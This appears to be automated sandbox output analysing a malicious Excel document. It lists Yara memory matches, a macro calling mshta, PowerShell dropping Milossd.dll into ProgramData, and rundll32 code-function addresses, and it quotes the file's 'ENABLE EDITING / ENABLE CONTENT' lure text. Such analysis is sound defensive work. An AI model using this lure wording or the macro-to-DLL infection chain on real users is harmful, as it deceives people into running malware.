Source: Yara match File source: 0000000C.00000002.510522270.0000000002E41000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.443244837.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.668746611.0000000010001000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.516180172.0000000000601000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.560022976.00000000025B1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.663136022.0000000000370000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.664371125.0000000002A11000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.515850446.00000000003C0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.664216814.0000000002800000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.665264578.0000000003031000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.560265506.0000000010001000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.510145612.00000000008B1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.663107682.0000000000341000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.509996233.0000000000700000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.559589643.0000000000291000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.560140675.00000000029A0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.664407337.0000000002A90000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.560066037.00000000028D0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.664117517.00000000026D1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.664190998.00000000027D1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.559766532.0000000000C21000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.510607759.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.510494175.0000000002DB0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.664248445.0000000002881000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.665204361.0000000002FC0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.664471765.0000000002B01000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.665308751.0000000003061000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.510409215.0000000002801000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.664297781.0000000002900000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.663687755.0000000000831000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.510379453.00000000027D0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.562204420.0000000000271000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.664663684.0000000002D10000.00000040.00000010.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.663778840.0000000000860000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.664161641.00000000027A0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.510352151.0000000002761000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.665168076.0000000002F70000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.516839554.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.665088679.0000000002EE1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.510556451.0000000002E91000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.510119980.0000000000880000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.559961394.0000000002400000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.562837454.0000000010001000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.559901253.0000000000E50000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.560096641.0000000002901000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.443390537.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.559852842.0000000000D81000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.664763356.0000000002D50000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: C:\ProgramData\Milossd.dll, type: DROPPED

System Summary

Source: DOCUMENT_2801.xls Macro extractor: Sheet: Macro3 contains: mshta
Source: Screenshot number: 4 Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document. 16 17 18 19 20 21 22
Source: Screenshot number: 4 Screenshot OCR: DOCUMENT IS PROTECTED. 11 12 13 Previewing is not available for protected documents. 14 15 Yo
Source: Screenshot number: 4 Screenshot OCR: protected documents. 14 15 You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to pre
Source: Screenshot number: 4 Screenshot OCR: ENABLE CONTENT" buttons to preview this document. 16 17 18 19 20 21 22 23 24 25 26 27 2
Source: Document image extraction number: 0 Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document.
Source: Document image extraction number: 0 Screenshot OCR: DOCUMENT IS PROTECTED. Previewing is not available for protected documents. You have to press "ENA
Source: Document image extraction number: 0 Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
Source: Document image extraction number: 0 Screenshot OCR: ENABLE CONTENT" buttons to preview this document.
Source: Document image extraction number: 1 Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document.
Source: Document image extraction number: 1 Screenshot OCR: DOCUMENT IS PROTECTED. Previewing is not available for protected documents. You have to press "ENA
Source: Document image extraction number: 1 Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
Source: Document image extraction number: 1 Screenshot OCR: ENABLE CONTENT" buttons to preview this document.
Source: Screenshot number: 8 Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document. :: 18 19 20 21 22 23
Source: Screenshot number: 8 Screenshot OCR: DOCUMENT IS PROTECTED. 11 12 13 ,, Previewing is not available for protected documents. L, 14
Source: Screenshot number: 8 Screenshot OCR: protected documents. L, 14 15 You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to
Source: Screenshot number: 8 Screenshot OCR: ENABLE CONTENT" buttons to preview this document. :: 18 19 20 21 22 23 24 25 26 27 28 2
Source: DOCUMENT_2801.xls Stream path 'Workbook' : ........ZO..........................\.p....xXx B.....a.........=...........................................=....... Xa&8.......X.@...........".......................1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.*.h...6...........C.a.l.i.b.r.i. .L.i.g.h.t.1...,...6...........C.a.l.i.b.r.i.1.......6...........C.a.l.i.b.r.i.1.......6...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.......<...........C.a.l.i.b.r.i.1.......>...........C.a.l.i.b.r.i.1.......?...........C.a.l.i.b.r.i.1.......4...........C.a.l.i.b.r.i.1.......4...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i...3......#.,.#.#.0.\. .".. ".;.\.-.#.,.#.#.0.\. .".. "...=......#.,.#.#.0.\. .".. ".;.[.R.e.d.].\.-.#.,.#.#.0.\. .".. "...?......#.,.#.#.0...0.0.\. .".. ".;.\.-.#.,.#.#.0...0.0.\. .".. "...I..."..#.,.#.#.0...0.0.\. .".. ".;.[.R.e.d.].\.-.#.,.#.#.0...0.0.\. .".. "...q.*.6.._.-.*. .#.,.#.#.0.\. .".. "._.-.;.\.-.*. .#.,.#.#.0.\. .".. "._.-.;._.-.*. .".-.".\. .".. "._.-.;._.-.@._.-...,.).'.._-* #,##0_-;\-* #,##0_-;_-* "-"_-;_-@_-....,.>.._.-.*. .#.,.#.#.0...0.0.\. .".. "._.-.;.\.-.*. .#.,.#.#.0...0.0.\. .".. "._.-.;._.-.*. .".-.".?.?.\. .".. "._.-.;._.-.@._.-...4.+./.._-* #,##0.00_-;\-* #,##0.00_-;_-* "-"??_-;_-@_-.......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ 
Source: DOCUMENT_2801.xls.0.dr Stream path 'Workbook'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\ProgramData\Milossd.dll
Source: DOCUMENT_2801.xls Initial sample: EXEC
Source: DOCUMENT_2801.xls Initial sample: EXEC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_10036007 11_2_10036007
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_10041050 11_2_10041050
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_1003130F 11_2_1003130F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_100323E2 11_2_100323E2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_10030460 11_2_10030460
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_10041592 11_2_10041592
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_1003E59F 11_2_1003E59F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_1003960C 11_2_1003960C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_100317E2 11_2_100317E2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_10040B0E 11_2_10040B0E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_10031BB6 11_2_10031BB6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_10041C56 11_2_10041C56
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_10036CB5 11_2_10036CB5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_1001CD16 11_2_1001CD16
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_10042D21 11_2_10042D21
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_10031FC2 11_2_10031FC2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002B9700 11_2_002B9700
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002C5CF9 11_2_002C5CF9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002C5040 11_2_002C5040
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002B6083 11_2_002B6083
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002C109E 11_2_002C109E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002B70ED 11_2_002B70ED
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002B911A 11_2_002B911A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002CA156 11_2_002CA156
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002BF154 11_2_002BF154
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002C41A7 11_2_002C41A7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002C9186 11_2_002C9186
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002C026B 11_2_002C026B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002BE243 11_2_002BE243
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002C129C 11_2_002C129C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002BC309 11_2_002BC309
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002CC38F 11_2_002CC38F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002CB391 11_2_002CB391
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002CD3C8 11_2_002CD3C8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002C542E 11_2_002C542E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002CA429 11_2_002CA429
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002BB41A 11_2_002BB41A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002D146E 11_2_002D146E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002C04B8 11_2_002C04B8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002CE498 11_2_002CE498
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002B44FA 11_2_002B44FA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002C64F1 11_2_002C64F1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002C74DD 11_2_002C74DD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002D04DE 11_2_002D04DE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002C3512 11_2_002C3512
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002BF58F 11_2_002BF58F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002C45CD 11_2_002C45CD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002C363D 11_2_002C363D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002C561F 11_2_002C561F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002D3672 11_2_002D3672
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002B8650 11_2_002B8650
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002B472E 11_2_002B472E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002B777B 11_2_002B777B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002C2753 11_2_002C2753
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002BB821 11_2_002BB821
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002B2830 11_2_002B2830
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002C1831 11_2_002C1831
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002BE86A 11_2_002BE86A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002C6864 11_2_002C6864
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002D0867 11_2_002D0867
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002BC850 11_2_002BC850
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002B88F4 11_2_002B88F4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002B68DE 11_2_002B68DE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002CD8D7 11_2_002CD8D7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002BF93D 11_2_002BF93D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002B194C 11_2_002B194C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002C0946 11_2_002C0946
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002B1950 11_2_002B1950
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002CC9A9 11_2_002CC9A9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002C99AA 11_2_002C99AA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002D1993 11_2_002D1993
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002B6A1F 11_2_002B6A1F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002B9A7D 11_2_002B9A7D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002BCA43 11_2_002BCA43
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002BAB66 11_2_002BAB66
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002BBB4B 11_2_002BBB4B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002D1B54 11_2_002D1B54
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002C4B56 11_2_002C4B56
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002B7B82 11_2_002B7B82
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002CEBFF 11_2_002CEBFF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002C2BF6 11_2_002C2BF6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002C7BCA 11_2_002C7BCA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002B6C29 11_2_002B6C29
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002CCC89 11_2_002CCC89
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002BEC9B 11_2_002BEC9B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002CACD3 11_2_002CACD3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002C0D33 11_2_002C0D33
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002BBD0F 11_2_002BBD0F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002C8D71 11_2_002C8D71
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002C3D41 11_2_002C3D41
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002D0D5B 11_2_002D0D5B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002BFD8C 11_2_002BFD8C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002B8D95 11_2_002B8D95
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002CBE8C 11_2_002CBE8C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002BAE9A 11_2_002BAE9A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002CEE94 11_2_002CEE94
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002B6ED6 11_2_002B6ED6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002CFF31 11_2_002CFF31
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002B2FA1 11_2_002B2FA1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002B3FB8 11_2_002B3FB8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002B1F9B 11_2_002B1F9B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002BCFCE 11_2_002BCFCE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00815483 12_2_00815483
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0082C089 12_2_0082C089
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0082B28C 12_2_0082B28C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0082E294 12_2_0082E294
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0081E09B 12_2_0081E09B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0082D898 12_2_0082D898
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0081A29A 12_2_0081A29A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0082049E 12_2_0082049E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0082069C 12_2_0082069C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0081F8B8 12_2_0081F8B8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0082A0D3 12_2_0082A0D3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0082CCD7 12_2_0082CCD7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_008162D6 12_2_008162D6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0082F8DE 12_2_0082F8DE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00815CDE 12_2_00815CDE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_008268DD 12_2_008268DD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_008164ED 12_2_008164ED
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_008258F1 12_2_008258F1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00817CF4 12_2_00817CF4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_008138FA 12_2_008138FA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_008250F9 12_2_008250F9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0081A81A 12_2_0081A81A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00824A1F 12_2_00824A1F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00815E1F 12_2_00815E1F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0081AC21 12_2_0081AC21
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00816029 12_2_00816029
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00829829 12_2_00829829
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0082482E 12_2_0082482E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00811C30 12_2_00811C30
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00820C31 12_2_00820C31
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00822A3D 12_2_00822A3D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0081BE43 12_2_0081BE43
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00824440 12_2_00824440
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0081D643 12_2_0081D643
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0081BC50 12_2_0081BC50
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00817A50 12_2_00817A50
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0082FC67 12_2_0082FC67
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00825C64 12_2_00825C64
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0081F66B 12_2_0081F66B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0081DC6A 12_2_0081DC6A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0083086E 12_2_0083086E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00832A72 12_2_00832A72
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00818E7D 12_2_00818E7D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00816F82 12_2_00816F82
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00828586 12_2_00828586
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0082B78F 12_2_0082B78F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0081F18C 12_2_0081F18C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0081E98F 12_2_0081E98F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00830D93 12_2_00830D93
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0082A791 12_2_0082A791
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00818195 12_2_00818195
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0081139B 12_2_0081139B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_008123A1 12_2_008123A1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_008235A7 12_2_008235A7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00828DAA 12_2_00828DAA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0082BDA9 12_2_0082BDA9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_008133B8 12_2_008133B8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00826FCA 12_2_00826FCA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0082C7C8 12_2_0082C7C8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_008239CD 12_2_008239CD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0081C3CE 12_2_0081C3CE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00821FF6 12_2_00821FF6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0082DFFF 12_2_0082DFFF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00818B00 12_2_00818B00
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0081B709 12_2_0081B709
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0081B10F 12_2_0081B10F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00822912 12_2_00822912
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0081851A 12_2_0081851A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00813B2E 12_2_00813B2E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00820133 12_2_00820133
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0082F331 12_2_0082F331
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0081ED3D 12_2_0081ED3D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00823141 12_2_00823141
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0081FD46 12_2_0081FD46
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0081AF4B 12_2_0081AF4B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00810D4C 12_2_00810D4C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00810D50 12_2_00810D50
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00821B53 12_2_00821B53
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00829556 12_2_00829556
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00823F56 12_2_00823F56
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0081E554 12_2_0081E554
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00830F54 12_2_00830F54
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0083015B 12_2_0083015B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00819F66 12_2_00819F66
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00828171 12_2_00828171
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00816B7B 12_2_00816B7B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00745CF9 12_2_00745CF9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_007370ED 12_2_007370ED
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_007474DD 12_2_007474DD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0074EE94 12_2_0074EE94
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0073EC9B 12_2_0073EC9B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0074E498 12_2_0074E498
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0074BE8C 12_2_0074BE8C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00751B54 12_2_00751B54
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0073F93D 12_2_0073F93D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00743512 12_2_00743512
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00739700 12_2_00739700
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0074B391 12_2_0074B391
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00738D95 12_2_00738D95
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00753672 12_2_00753672
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00739A7D 12_2_00739A7D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00746864 12_2_00746864
